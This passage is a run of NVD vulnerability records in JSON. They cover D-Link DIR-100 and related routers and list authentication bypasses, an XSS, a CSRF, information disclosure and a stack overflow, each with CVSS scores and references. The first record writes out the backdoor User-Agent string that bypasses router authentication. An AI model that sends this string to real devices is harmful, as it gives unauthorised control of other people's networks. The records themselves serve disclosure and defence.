    "dateUpdated": "2024-08-06T17:53:45.856Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Vulnerability from fkie_nvd
Published
2013-10-19 10:36
Modified
2024-11-21 01:58
Severity: HIGH (CVSS v2 base score 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C)
Summary
The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:di-524up:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "157FE837-AA4B-46AD-A2C2-1E9A690FA7DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:di-604\\+:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8D8643C-5683-429D-9B9F-3A9C2B26ADF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:di-604s:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "076B3A72-3CF5-49CA-9104-D6D1667CE260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:di-604up:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4632D90B-C66E-4E72-B56B-C9B81C3FB85C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:di-624s:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F92DC565-F84C-4881-AA54-F07C988E3B90",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:dir-120:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "030E2C73-B17D-4F52-83B5-24C2042A5761",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:dlink:tm-g5240:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "45DB67B1-BD0F-4B2F-8025-B0A39F821051",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:alphanetworks:vdsl_asl-55052:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "38D71280-715B-4872-86DD-528DBD0C4EEE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:alphanetworks:vdsl_asl-56552:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "630148D9-4FFC-4630-8D99-4F7DA068D3C1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:planex:brl-04cw:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F22A84F3-0A51-4CF5-B0B2-E41F02D10401",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:planex:brl-04r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7B26C5C-508E-426B-ACC7-148515E5FFF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:planex:brl-04ur:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6E83607-47A8-49B5-8C5B-5A25F8F19389",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013."
    },
    {
      "lang": "es",
      "value": "La interfaz web de D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604 + y TM-G5240 routers; Planex BRL-04R, Brasil-04UR y routers BRL-04CW, y Redes Alfa enrutadores permite a atacantes remotos evitar la autenticaci\u00f3n y modificar la configuraci\u00f3n especificando  un encabezado HTTP User-Agent   xmlset_roodkcableoj28840ybtide"
    }
  ],
  "id": "CVE-2013-6026",
  "lastModified": "2024-11-21T01:58:38.767",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-10-19T10:36:08.963",
  "references": [
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
    },
    {
      "source": "cret@cert.org",
      "url": "http://www.dlink.com/uk/en/support/security"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/248083"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.dlink.com/uk/en/support/security"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/248083"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
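Severity: CRITICAL (CVSS v3.1 base score 9.8, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); MEDIUM (CVSS v2 base score 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N)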
Summary
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure
Impacted products
Vendor Product Version
dlink dir-100_firmware 4.03b07
dlink dir-100 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure"
    },
    {
      "lang": "es",
      "value": "D-Link DIR-100 versi\u00f3n 4.03B07, presenta una divulgaci\u00f3n de informaci\u00f3n de PPTP y poe."
    }
  ],
  "id": "CVE-2013-7055",
  "lastModified": "2024-11-21T02:00:15.093",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-04T14:15:12.450",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290/info"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290/info"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-522"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Summary
D-Link DIR-100 4.03B07: cli.cgi XSS
Impacted products
Vendor Product Version
dlink dir-100_firmware 4.03b07
dlink dir-100 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DIR-100 4.03B07: cli.cgi XSS"
    },
    {
      "lang": "es",
      "value": "D-Link DIR-100 versi\u00f3n 4.03B07: vulnerabilidad de tipo XSS del archivo cli.cgi."
    }
  ],
  "id": "CVE-2013-7054",
  "lastModified": "2024-11-21T02:00:14.943",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-04T14:15:12.340",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290/info"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290/info"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Summary
D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script
Impacted products
Vendor Product Version
dlink dir-100_firmware 4.03b07
dlink dir-100 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script"
    },
    {
      "lang": "es",
      "value": "D-Link DIR-100 versi\u00f3n 4.03B07: una omisi\u00f3n de seguridad por medio de un error en el script cliget.cgi"
    }
  ],
  "id": "CVE-2013-7052",
  "lastModified": "2024-11-21T02:00:14.637",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-04T14:15:11.403",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-522"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Summary
D-Link DIR-100 4.03B07: cli.cgi CSRF
Impacted products
Vendor Product Version
dlink dir-100_firmware 4.03b07
dlink dir-100 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DIR-100 4.03B07: cli.cgi CSRF"
    },
    {
      "lang": "es",
      "value": "D-Link DIR-100 versi\u00f3n 4.03B07: vulnerabilidad de tipo CSRF del archivo cli.cgi."
    }
  ],
  "id": "CVE-2013-7053",
  "lastModified": "2024-11-21T02:00:14.800",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-04T14:15:11.777",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290/info"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290/info"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Summary
D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters
Impacted products
Vendor Product Version
dlink dir-100_firmware 4.03b07
dlink dir-100 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters"
    },
    {
      "lang": "es",
      "value": "D-Link DIR-100 versi\u00f3n 4.03B07: una omisi\u00f3n de seguridad del archivo cli.cgi debido a un fallo al comprobar los par\u00e1metros de autenticaci\u00f3n."
    }
  ],
  "id": "CVE-2013-7051",
  "lastModified": "2024-11-21T02:00:14.493",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-02-04T14:15:11.323",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.exploit-db.com/exploits/31425"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.exploit-db.com/exploits/31425"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.securityfocus.com/bid/65290"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2013-10-19 10:36
Modified
2024-11-21 01:58
Summary
Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.
Impacted products
Vendor Product Version
dlink dir-100 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de pila en la funci\u00f3n RuntimeDiagnosticPing en /bin/webs en routers D-Link DIR-100 podr\u00eda permitir a administradores autenticados remotamente ejecutar comandos de forma arbitraria a trav\u00e9s de un par\u00e1metro largo set/runtime/diagnostic/pingIp a Tools/tools_misc.xgi."
    }
  ],
  "id": "CVE-2013-6027",
  "lastModified": "2024-11-21T01:58:38.873",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 8.5,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-10-19T10:36:09.180",
  "references": [
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://pastebin.com/raw.php?i=vbiG42VD"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/248083"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://pastebin.com/raw.php?i=vbiG42VD"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/248083"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
